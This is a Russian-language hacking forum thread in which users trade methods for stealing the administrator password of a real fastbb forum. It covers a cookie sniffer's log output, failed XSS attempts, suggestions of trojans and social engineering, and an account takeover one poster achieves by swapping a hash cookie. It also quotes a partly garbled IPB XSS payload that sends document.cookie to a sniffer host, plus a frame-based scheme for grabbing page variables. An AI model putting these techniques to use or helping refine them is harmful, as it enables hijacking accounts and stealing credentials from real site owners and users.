Подсткажите мне плиз, что делать...
ситуация такая: на форуме fastbb я пытаюсь проделать операцию со сниффером....

когда чуваки кликают на мою ссылку то получаю я только

23.12.2005 21:53
IP 213.85.170.14
Real Ip 213.85.170.14
Referer http://1548.fastbb.ru/index.pl?1-3-0-00000003-000-0-0-1135367062
Query
Browser Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.3 (build 01218))


в Query ничего нет!!! а должно быть.... когда я пытался писать <script>, то он просто не выполнял его....просто писал в посте <script>... и т.д.

как узнать пароль-то (можно и логин, хотя я его знаю...ну всмысле админский..)...

прошу помочь...жду

там щас нету ксс, да и пароль уже в открытом виде не лежит =))
так что никак. хотя есть трояны, СИ... другие способы взлома, например унать где он еще обитает и попробывать взломать тот форум, узнать пароль оттуда и попробывать его... и тд тп.
<script>, то он просто не выполнял его....просто писал в посте <script>.
удивительно :)

т.е. вооще никак или надо уже новые способы придумывать???

а о что написано на http://forum.antichat.ru/thread10613.html ужене поможет???

дык там написано про пхпбб, а не про фастбб.
совершено разные форумы.

там и про fastbb и про IPB написано...там много чего написано... просто про fastBB ниже чем phpBB....но в этом же посте (т.е. в 1-ом)

ну у тебя работает тот код? =))
наверно нет...
почему не поможет? для общих познаний поможет... может быть свою найдешь...

НИЧЕГО нового про Fastbb не появилось??? если появилось, то скажите плиз....

ZetRoX
в fastBB при смене пароля НЕ требуется вводить текущий пароль. Вполне потенциальная уязвимость. Я щаз как раз одному гаду fastBB грохаю -может пройдет.
P.S. сниффер ты через это не внидришь но админом станешь )

если получится, то обязательно отпишись....у меня как-то раз было такое....я зашел в учетку другого юзера, а открылось окно как будто мое...я изменил пароль и зашел под тем ником и своим паролем... (это был админ)....но 2-ой раз так не получилось....хехех....такое ощущение, что это работает когда пароль сохранен...ну, чтобы не вводить каждый раз, когда входишь....

Как на фастбб узнать тот запрос, который я отправляю при смене пароля?
Там же всё через яваскрипт, весь форум

Используйте Naviscope.
Как настраивать и ссылка есть на сайте.
Вообщето он не на яваскриптах. Движок всёравно на перле.
Но жабаскриптиков там много, это да...

Извините, если пишу непотребщину, я в хакинге новичок.

у меня тут тоже проблема. пароль лежит в непойми-каком хэш-виде:
hи3bвофxфъp5eфде. Причем лежит он как в куках, так и в простой js переменный. Ник тоже лежит тоже в js переменной, а в куках не лежит. Хэш всегда один ( в смысле от времени не зависит), мож кто знает, что там ща за алгоритм хэширования??
Даже если добыть этот хэш админа, дальше-то что делать?

Я вот что думаю: сделать двух-фреймовую страницу, на верхнем фрейме кнопку, которая будет изменять переменные nick и parol в нижнем фрейме (это возможно ли??). В нижний - грузить форум, который надо сломать.

В общем, отзовитесь, кто его ща ломает. Поделитесь соображениями.

Кстати, в самом движке (index.pl) уязвимостей нет? Там все через этот скрипт фигачится.

comcon1

Если у тебя есть куки админчика, то подставь их себе и выдавай себя за него ;)

В опере : Инструменты - Дополнительно - Cookies. Там ищи адрес этого форума, смотри инфу которую нежно сменить. Ну там, сессию удалить, ник сменить... И хэш этот, если он в куках таковой лежит у админа, то и себе его воткни. Теперь рефрешим страницу и вуаля.

нет. так не получается. апдейтом он не жрет другой хэш почему-то.

А получилось так: запустил эксплорер, зашел под tester-ом, закрыл эксплорер (сессия не умерла, куки тоже). В кук-едиторе изменил кук хэша. Открыл эксплорер, зашел на форум - сразу оказался в админе!! видимо он по кэшу юзера находит сам. хехе..

Теперь такой вопрос: если вставить ссылку на сниффер в пост и админ по ней перейдет его куки спереть удастся??

Если просто тупо ссылку вставить, то нет. Если ты дашь ссылку на снифер, то это уже другой сервак будет... Снифер это по сути картинка, но если ее кто-то глянул, то отдал куки. Так вот, если ты обратишься к сниферунапямую, то куков никаих не будет. А если ты найдешь метод как внедрить свою картинку в страницу, да еще и скажешь куки туда прицепить, то другое дело!

Возьмем например уязвимость ИПБ
document.cookie%3Bimg=new%20Image()%3Bimg.src=%27� �НИФЕР%3F%27%2Bx/*.jpg*///.gif Видишь, ты создаешь картинку, которая шлет куки на снифер.
Чтобы куки украсть надо юзать различные XSS. Они могут быть везде... В скриптах всяких, в аватарах, в тэгах...

да. это я понял. судя по поиску, fastbb залатал бывшие в нем xss-баги совсем недавно и сейчас к нему не подступиться. мона ли, к примеру, запостить ссылку на страницу, которая в одном фрейме открывает сниффер, а в другом - этот же форум. и сниффер тырит js-переменные из форума и отправляет на другой сниффер. ???